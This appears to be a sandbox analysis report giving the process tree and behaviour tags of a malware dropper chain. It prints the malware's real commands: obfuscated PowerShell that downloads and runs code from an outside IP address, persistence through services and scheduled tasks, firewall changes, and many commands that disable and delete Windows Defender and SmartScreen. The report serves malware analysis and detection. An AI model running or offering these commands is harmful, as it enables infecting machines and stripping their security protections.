- Suspicious use of AdjustPrivilegeToken
PID:4988

C:\Users\Admin\AppData\Local\Temp\BJ4F6.exe
"C:\Users\Admin\AppData\Local\Temp\BJ4F6.exe"
7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5532

C:\Users\Admin\AppData\Local\Temp\H9LM9.exe
"C:\Users\Admin\AppData\Local\Temp\H9LM9.exe"
7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:5232

C:\Users\Admin\AppData\Local\Temp\F1BG9.exe
"C:\Users\Admin\AppData\Local\Temp\F1BG9.exe"
7⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:5872

C:\Users\Admin\AppData\Local\Temp\M7AEC13I8KEH8BD.exe
https://iplogger.org/1nChi7
7⤵
PID:5420

C:\Users\Admin\AppData\Local\Temp\A23L2.exe
"C:\Users\Admin\AppData\Local\Temp\A23L2.exe"
7⤵
- Executes dropped EXE
- Checks computer location settings
PID:4740

C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" -S .\b0EiM8L.W -U
8⤵
- Loads dropped DLL
PID:1804

C:\Users\Admin\Documents\fkozqZVOJK8nYg3uy3BmTTkU.exe
"C:\Users\Admin\Documents\fkozqZVOJK8nYg3uy3BmTTkU.exe"
6⤵
- Executes dropped EXE
PID:4404

C:\Users\Admin\AppData\Local\Temp\7zSD280.tmp\Install.exe
.\Install.exe
7⤵
- Executes dropped EXE
PID:2456

C:\Users\Admin\Documents\xQJudsUslbRDEyOqmqKmWsYK.exe
"C:\Users\Admin\Documents\xQJudsUslbRDEyOqmqKmWsYK.exe"
6⤵
- Executes dropped EXE
PID:4392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 344
7⤵
- Program crash
PID:5264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 344
7⤵
- Program crash
PID:4928

C:\Users\Admin\Documents\74CIU7hguX3Rep8AcBT0owXq.exe
"C:\Users\Admin\Documents\74CIU7hguX3Rep8AcBT0owXq.exe"
6⤵
- Executes dropped EXE
PID:4364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4364 -s 432
7⤵
- Program crash
PID:4500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4364 -s 440
7⤵
- Program crash
PID:6068

C:\Users\Admin\Documents\UBGIMlfT_24VXrYTNn4S0uSp.exe
"C:\Users\Admin\Documents\UBGIMlfT_24VXrYTNn4S0uSp.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
PID:4332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\123\main.bat" /s"
7⤵
PID:5640

C:\Windows\system32\mode.com
mode 65,10
8⤵
PID:5556

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e file.zip -p320791618516055 -oextracted
8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4384

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e extracted/file_9.zip -oextracted
8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2264

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e extracted/file_8.zip -oextracted
8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2512

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e extracted/file_7.zip -oextracted
8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6012

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e extracted/file_6.zip -oextracted
8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1632

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e extracted/file_5.zip -oextracted
8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6096

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e extracted/file_4.zip -oextracted
8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4116

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e extracted/file_3.zip -oextracted
8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:444

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e extracted/file_2.zip -oextracted
8⤵
PID:1644

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e extracted/file_1.zip -oextracted
8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4984

C:\Windows\system32\attrib.exe
attrib +H "Result_protected.exe"
8⤵
- Views/modifies file attributes
PID:5124

C:\Users\Admin\AppData\Local\Temp\123\Result_protected.exe
"Result_protected.exe"
8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
PID:4600

C:\Users\Admin\AppData\Local\Temp\build.exe
"C:\Users\Admin\AppData\Local\Temp\build.exe"
9⤵
- Executes dropped EXE
- Checks computer location settings
PID:4524

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"
10⤵
- Creates scheduled task(s)
PID:220

C:\Users\Admin\AppData\Local\Temp\222.exe
"C:\Users\Admin\AppData\Local\Temp\222.exe"
9⤵
- Executes dropped EXE
PID:5296

C:\Users\Admin\Documents\CyPSXzY1M1Ivhbr6JmTc7SY5.exe
"C:\Users\Admin\Documents\CyPSXzY1M1Ivhbr6JmTc7SY5.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
PID:4308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 624
7⤵
- Program crash
PID:5240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 660
7⤵
- Program crash
PID:5328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 632
7⤵
- Program crash
PID:3900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 728
7⤵
- Program crash
PID:5724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 840
7⤵
- Program crash
PID:4452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 1268
7⤵
- Program crash
PID:5636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 1240
7⤵
- Program crash
PID:5648

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "CyPSXzY1M1Ivhbr6JmTc7SY5.exe" /f & erase "C:\Users\Admin\Documents\CyPSXzY1M1Ivhbr6JmTc7SY5.exe" & exit
7⤵
PID:6000

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "CyPSXzY1M1Ivhbr6JmTc7SY5.exe" /f
8⤵
- Kills process with taskkill
PID:6024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 1128
7⤵
- Program crash
PID:5256

C:\Users\Admin\Documents\mSHXhzqCbB4jwXEZq1ycglga.exe
"C:\Users\Admin\Documents\mSHXhzqCbB4jwXEZq1ycglga.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
PID:4300

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\bsxnalar\
7⤵
PID:5556

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create bsxnalar binPath= "C:\Windows\SysWOW64\bsxnalar\nflmumnc.exe /d\"C:\Users\Admin\Documents\mSHXhzqCbB4jwXEZq1ycglga.exe\"" type= own start= auto DisplayName= "wifi support"
7⤵
PID:6084

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description bsxnalar "wifi internet conection"
7⤵
PID:4032

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start bsxnalar
7⤵
PID:1996

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\nflmumnc.exe" C:\Windows\SysWOW64\bsxnalar\
7⤵
PID:5836

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
7⤵
PID:5832

C:\Users\Admin\bpqsuzmp.exe
"C:\Users\Admin\bpqsuzmp.exe" /d"C:\Users\Admin\Documents\mSHXhzqCbB4jwXEZq1ycglga.exe"
7⤵
- Executes dropped EXE
- Checks computer location settings
PID:2412

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\cqrtvanq.exe" C:\Windows\SysWOW64\bsxnalar\
8⤵
PID:1504

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" config bsxnalar binPath= "C:\Windows\SysWOW64\bsxnalar\cqrtvanq.exe /d\"C:\Users\Admin\bpqsuzmp.exe\""
8⤵
PID:5280

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start bsxnalar
8⤵
PID:5956

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
8⤵
PID:4224

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4882.bat" "
8⤵
PID:4820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2412 -s 1308
8⤵
- Program crash
PID:5816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4300 -s 1156
7⤵
- Program crash
PID:5928

C:\Users\Admin\Documents\VZ7NTurPKHOFfMK1BrDT_Vg7.exe
"C:\Users\Admin\Documents\VZ7NTurPKHOFfMK1BrDT_Vg7.exe"
6⤵
- Executes dropped EXE
- Checks processor information in registry
PID:4164

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
7⤵
- Blocklisted process makes network request
PID:5212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 1000
7⤵
- Program crash
PID:4432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 1008
7⤵
- Program crash
PID:5692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 1044
7⤵
- Program crash
PID:5836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 1052
7⤵
- Program crash
PID:5484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 1008
7⤵
- Program crash
PID:1892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 1048
7⤵
- Program crash
PID:5792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 1080
7⤵
- Program crash
PID:5160

C:\Users\Admin\Documents\IF3sualFSZNKp2Oo3vzXX3_r.exe
"C:\Users\Admin\Documents\IF3sualFSZNKp2Oo3vzXX3_r.exe"
6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4156

C:\Users\Admin\Documents\V3ujjI6J5Cgn10sQZ2ltQJBx.exe
"C:\Users\Admin\Documents\V3ujjI6J5Cgn10sQZ2ltQJBx.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:4148

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/SkyDrive.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:4836

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/Fax.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
7⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:5004

C:\Windows\SysWOW64\svchost.exe
"C:\Windows\System32\svchost.exe"
8⤵
PID:4996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4996 -s 488
9⤵
- Program crash
PID:1596

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/Offer/Offer.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
7⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:4752

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c attrib +s +h C:\Users\Admin\AppData\Roaming\OneDrive
8⤵
PID:5512

C:\Windows\SysWOW64\attrib.exe
attrib +s +h C:\Users\Admin\AppData\Roaming\OneDrive
9⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Views/modifies file attributes
PID:5420

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c attrib +s +h C:\ProgramData\OneDrive
8⤵
PID:992

C:\Windows\SysWOW64\attrib.exe
attrib +s +h C:\ProgramData\OneDrive
9⤵
- Views/modifies file attributes
PID:5844

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -exec bypass start-process C:\Users\Admin\AppData\Roaming\OneDrive\Offer.vbs
8⤵
PID:5848

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\OneDrive\Offer.vbs"
9⤵
PID:5060

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\OneDrive\Offer.bat" "
10⤵
PID:5620

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
11⤵
PID:6024

C:\Users\Admin\AppData\Roaming\OneDrive\Offer.exe
Offer.exe
11⤵
PID:4256

C:\Windows\SysWOW64\timeout.exe
timeout /t 4
11⤵
- Delays execution with timeout.exe
PID:5512

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
11⤵
PID:5304

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
11⤵
PID:4844

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
11⤵
PID:5208

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
11⤵
PID:1520

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
11⤵
PID:5244

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
11⤵
PID:4188

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
11⤵
- Adds Run key to start application
PID:4836

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
11⤵
PID:5824

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
11⤵
PID:60

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
11⤵
PID:2524

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f
11⤵
PID:960

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f
11⤵
PID:4452

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t "REG_DWORD" /d "0" /f
11⤵
PID:4536

C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\smartscreen.exe" /a
11⤵
- Executes dropped EXE
- Possible privilege escalation attempt
- Loads dropped DLL
- Modifies file permissions
PID:1644

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\smartscreen.exe" /grant:r Administrators:F /c
11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5124

C:\Windows\SysWOW64\taskkill.exe
taskkill /im smartscreen.exe /f
11⤵
- Kills process with taskkill
PID:4132

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyMonitor" /Disable
11⤵
PID:1444

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyRefreshTask" /Disable
11⤵
PID:5452

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
11⤵
PID:696

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
11⤵
PID:5096

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
11⤵
PID:4284

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
11⤵
PID:5084

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
11⤵
PID:5440

C:\Windows\SysWOW64\sc.exe
sc stop WinDefend
11⤵
PID:6040

C:\Windows\SysWOW64\sc.exe
sc stop WdNisDrv
11⤵
PID:1312

C:\Windows\SysWOW64\sc.exe
sc stop WdNisSvc
11⤵
PID:5540

C:\Windows\SysWOW64\sc.exe
sc stop WdFilter
11⤵
PID:6056

C:\Windows\SysWOW64\sc.exe
sc stop WdBoot
11⤵
PID:1140

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
11⤵
PID:5812

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
11⤵
PID:6124

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
11⤵
PID:4372

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
11⤵
PID:5448

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
11⤵
PID:4012

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
11⤵
PID:5956

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
11⤵
PID:3420

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
11⤵
PID:5856

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
11⤵
PID:5868

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
11⤵
PID:2528

C:\Windows\SysWOW64\timeout.exe
timeout /t 2
11⤵
- Delays execution with timeout.exe
PID:4684

C:\Users\Admin\AppData\Roaming\OneDrive\Power.exe
Power.exe Regedit.exe /S Offer.reg
11⤵
PID:5360

C:\Users\Admin\AppData\Roaming\OneDrive\Power.exe
"C:\Users\Admin\AppData\Roaming\OneDrive\Power.exe" Regedit.exe /S Offer.reg
12⤵
PID:5176

C:\Users\Admin\AppData\Roaming\OneDrive\Power.exe
"C:\Users\Admin\AppData\Roaming\OneDrive\Power.exe" /TI/ Regedit.exe /S Offer.reg
13⤵
PID:4852

C:\Windows\Regedit.exe
"C:\Windows\Regedit.exe" /S Offer.reg
14⤵
- Runs .reg file with regedit
PID:4760

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance" /f
11⤵
PID:5004

C:\Windows\SysWOW64\sc.exe
sc delete SgrmBroker
11⤵
PID:5896

C:\Windows\SysWOW64\sc.exe
sc delete SgrmAgent
11⤵
PID:4664

C:\Windows\SysWOW64\sc.exe
sc delete SecurityHealthService
11⤵
PID:5784

C:\Windows\SysWOW64\sc.exe
sc delete WdBoot
11⤵
PID:4472

C:\Windows\SysWOW64\sc.exe
sc delete WdFiltrer
11⤵
PID:4884

C:\Windows\SysWOW64\sc.exe
sc delete WdNisSvc
11⤵
PID:5880

C:\Windows\SysWOW64\sc.exe
sc delete WdNisDrv
11⤵
PID:5612

C:\Windows\SysWOW64\sc.exe
sc delete wscsvc
11⤵
PID:4896

C:\Windows\SysWOW64\sc.exe
sc delete Sense
11⤵
PID:4892

C:\Windows\SysWOW64\sc.exe
sc delete WinDefend
11⤵
PID:4724

C:\Windows\SysWOW64\timeout.exe
timeout /t 2
11⤵
- Delays execution with timeout.exe
PID:3388

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath "C:/Windows"
11⤵
PID:3600

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath "C:/Users"
11⤵
PID:3024

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring"
11⤵
PID:4656

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
11⤵
PID:4412

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -PUAProtection disable"
11⤵
PID:2276

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
7⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:5112

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
8⤵
PID:3836

C:\Users\Admin\Documents\lp8mRbbLvvUw_NlFQIsm6Yjz.exe
"C:\Users\Admin\Documents\lp8mRbbLvvUw_NlFQIsm6Yjz.exe"
6⤵
- Executes dropped EXE
PID:4140

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im lp8mRbbLvvUw_NlFQIsm6Yjz.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\lp8mRbbLvvUw_NlFQIsm6Yjz.exe" & del C:\ProgramData\*.dll & exit
7⤵
PID:880

C:\Windows\SysWOW64\taskkill.exe
taskkill /im lp8mRbbLvvUw_NlFQIsm6Yjz.exe /f
8⤵
- Kills process with taskkill
PID:5260

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
8⤵
- Delays execution with timeout.exe
PID:6136

C:\Users\Admin\Documents\V8mSDJYVZdnfkoOXRHQbNy2T.exe
"C:\Users\Admin\Documents\V8mSDJYVZdnfkoOXRHQbNy2T.exe"
6⤵
- Executes dropped EXE
PID:3616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3616 -s 448
7⤵
- Program crash
PID:5952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3616 -s 440
7⤵
- Program crash
PID:5044

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_5.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:1492

C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_5.exe
sotema_5.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:448

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_4.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2180

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_3.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:3108

C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_3.exe
sotema_3.exe
5⤵
- Executes dropped EXE
- Modifies system certificate store
PID:860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 860 -s 1064
6⤵
- Program crash
PID:3324

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_2.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:1224

C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_2.exe
sotema_2.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1640

C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_4.exe
sotema_4.exe
1⤵
